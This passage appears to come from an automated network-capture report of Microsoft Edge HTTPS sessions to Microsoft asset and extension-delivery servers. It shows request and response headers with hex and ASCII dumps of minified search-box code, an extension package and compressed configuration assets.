2024-11-25 10:34:06 UTC	8204	IN	Data Raw: 6c 69 67 68 74 22 2c 76 6f 69 64 20 30 29 2c 28 30 2c 6f 2e 67 6e 29 28 5b 77 2e 6c 6b 5d 2c 50 2e 70 72 6f 74 6f 74 79 70 65 2c 22 67 65 74 50 6c 61 63 65 68 6f 6c 64 65 72 22 2c 6e 75 6c 6c 29 2c 28 30 2c 6f 2e 67 6e 29 28 5b 77 2e 6c 6b 5d 2c 50 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 61 62 6c 65 53 65 61 72 63 68 53 75 67 67 65 73 74 69 6f 6e 47 68 6f 73 74 54 65 6d 70 6c 61 74 65 22 2c 6e 75 6c 6c 29 2c 50 3d 28 30 2c 6f 2e 67 6e 29 28 5b 79 2e 62 5d 2c 50 29 3b 76 61 72 20 49 3d 6e 28 35 30 36 33 32 29 2c 41 3d 6e 28 34 30 33 37 38 29 2c 52 3d 6e 28 39 35 38 29 2c 4c 3d 6e 28 32 37 34 36 30 29 2c 24 3d 6e 28 37 34 34 34 39 29 2c 4d 3d 6e 28 34 32 36 38 39 29 2c 45 3d 6e 28 32 36 37 33 38 29 2c 42 3d 6e 28 33 38 34 39 32 29 2c 6a 3d 6e 28 35 33 31 Data Ascii: light",void 0),(0,o.gn)([w.lk],P.prototype,"getPlaceholder",null),(0,o.gn)([w.lk],P.prototype,"enableSearchSuggestionGhostTemplate",null),P=(0,o.gn)([y.b],P);var I=n(50632),A=n(40378),R=n(958),L=n(27460),$=n(74449),M=n(42689),E=n(26738),B=n(38492),j=n(531
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 36 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 64 65 65 70 2d 73 65 61 72 63 68 2d 62 74 6e 20 23 62 5f 73 68 5f 62 74 6e 5f 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 60 2e 77 69 74 68 42 65 68 61 76 69 6f 72 73 28 28 30 2c 48 2e 55 75 29 28 4f 2e 69 60 20 2e 64 65 65 70 2d 73 65 61 72 63 68 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 61 34 61 34 61 3b 63 6f 6c 6f 72 3a 23 61 32 62 37 66 34 7d 2e 64 65 65 70 2d 73 65 61 72 63 68 2d 62 74 6e 20 23 62 5f 73 68 5f 62 74 6e 5f 69 73 70 72 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: 00004000th:24px;height:24px;margin-right:6px;display:inline-block}.deep-search-btn #b_sh_btn_text{line-height:24px;font-size:14px}`.withBehaviors((0,H.Uu)(O.i` .deep-search-btn{background:#4a4a4a;color:#a2b7f4}.deep-search-btn #b_sh_btn_isprt{background
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 65 28 29 29 7d 60 2c 59 65 3d 0d 0a Data Ascii: e())}`,Ye=
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 76 65 2e 64 79 60 24 7b 65 3d 3e 65 2e 73 65 61 72 63 68 42 75 74 74 6f 6e 4f 6e 4c 65 66 74 26 26 33 3d 3d 3d 65 2e 73 65 61 72 63 68 49 63 6f 6e 54 72 65 61 74 6d 65 6e 74 3f 71 65 3a 21 65 2e 73 65 61 72 63 68 42 75 74 74 6f 6e 4f 6e 4c 65 66 74 7c 7c 31 21 3d 3d 65 2e 73 65 61 72 63 68 49 63 6f 6e 54 72 65 61 74 6d 65 6e 74 26 26 32 21 3d 3d 65 2e 73 65 61 72 63 68 49 63 6f 6e 54 72 65 61 74 6d 65 6e 74 3f 65 2e 73 65 61 72 63 68 49 63 6f 6e 3f 4a 65 3a 51 65 3a 4b 65 7d 60 2c 58 65 3d 76 65 2e 64 79 60 3c 66 6c 75 65 6e 74 2d 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 70 61 72 74 3d 22 62 75 74 74 6f 6e 22 20 74 69 74 6c 65 3d 24 7b 65 3d 3e 65 2e 6f 70 74 69 6f 6e 73 26 26 65 2e 6f 70 Data Ascii: 00004000ve.dy`${e=>e.searchButtonOnLeft&&3===e.searchIconTreatment?qe:!e.searchButtonOnLeft\|\|1!==e.searchIconTreatment&&2!==e.searchIconTreatment?e.searchIcon?Je:Qe:Ke}`,Xe=ve.dy`<fluent-button class="search-btn" part="button" title=${e=>e.options&&e.op
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 46 46 46 46 7d 7d 24 7b 75 2e 0d 0a Data Ascii: FFFF}}${u.
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 66 31 7d 20 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 2e 61 64 2d 73 6c 75 67 20 2e 61 64 2d 6c 61 62 65 6c 2c 2e 24 7b 28 30 2c 67 2e 6c 6a 29 28 22 2e 61 64 2d 73 6c 75 67 22 29 7d 20 2e 24 7b 28 30 2c 67 2e 6c 6a 29 28 22 2e 61 64 2d 6c 61 62 65 6c 22 29 7d 7b 62 6f 72 64 65 72 3a 30 2e 35 70 78 20 73 6f 6c 69 64 20 62 75 74 74 6f 6e 74 65 78 74 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 61 64 2d 73 6c 75 67 20 2e 61 64 2d 6c 61 62 65 6c 2d 74 65 78 74 2c 2e 24 7b 28 30 2c 67 2e 6c 6a 29 28 22 2e 61 64 2d 73 6c 75 67 22 29 7d 20 2e 24 7b 28 30 2c 67 2e 6c 6a 29 28 22 2e 61 64 2d 6c 61 62 65 6c 2d 74 65 78 74 22 29 7d 7b 63 6f 6c 6f 72 3a 62 75 74 74 6f 6e 74 65 78 74 3b 6f 70 61 63 Data Ascii: 00004000f1} @media (forced-colors:active){.ad-slug .ad-label,.${(0,g.lj)(".ad-slug")} .${(0,g.lj)(".ad-label")}{border:0.5px solid buttontext;opacity:1}.ad-slug .ad-label-text,.${(0,g.lj)(".ad-slug")} .${(0,g.lj)(".ad-label-text")}{color:buttontext;opac
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 74 69 6f 6e 26 26 65 2e 62 65 0d 0a Data Ascii: tion&&e.be

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	49907	23.200.0.6	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:05 UTC	614	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733135643&P2=404&P3=2&P4=XcmKW8ZHXjEpO7A0uoDPSFZuQnpmTDX7wVhiyEqMmoqf5tEEZTxC%2ffvvmy93ZahKboeCU84CTwXOlZWlgZAI7g%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: +R0Ozd05pDBjvbYCcLLL+p Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	1250	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: 4e4c1a90-55e7-4665-bb67-d80e8d5c061c MS-RequestId: 4f6f7d3f-5ccc-4755-ab08-53e16316d2b2 MS-CV: coOmAe5tDq8HeyOVMZftpz.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86389 Date: Mon, 25 Nov 2024 10:34:06 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.45.172.22,b=538802039,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_PISCATAWAY,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.16ac2d17.1732530846.201d7777 Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
2024-11-25 10:34:06 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	49906	13.107.246.63	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	577	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: f2f90ee0-f01e-003d-23ad-3edd21000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T103406Z-178bfbc474bv7whqhC1NYC1fg4000000077g00000000bk2w Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-25 10:34:06 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49905	13.107.246.63	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	576	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT ETag: 0x8DD0B38CBCCFA90 x-ms-request-id: d5ee3f81-701e-0068-2406-3f3656000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T103406Z-15b8b599d88cn5thhC1TEBqxkn00000005mg00000000fs8y Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
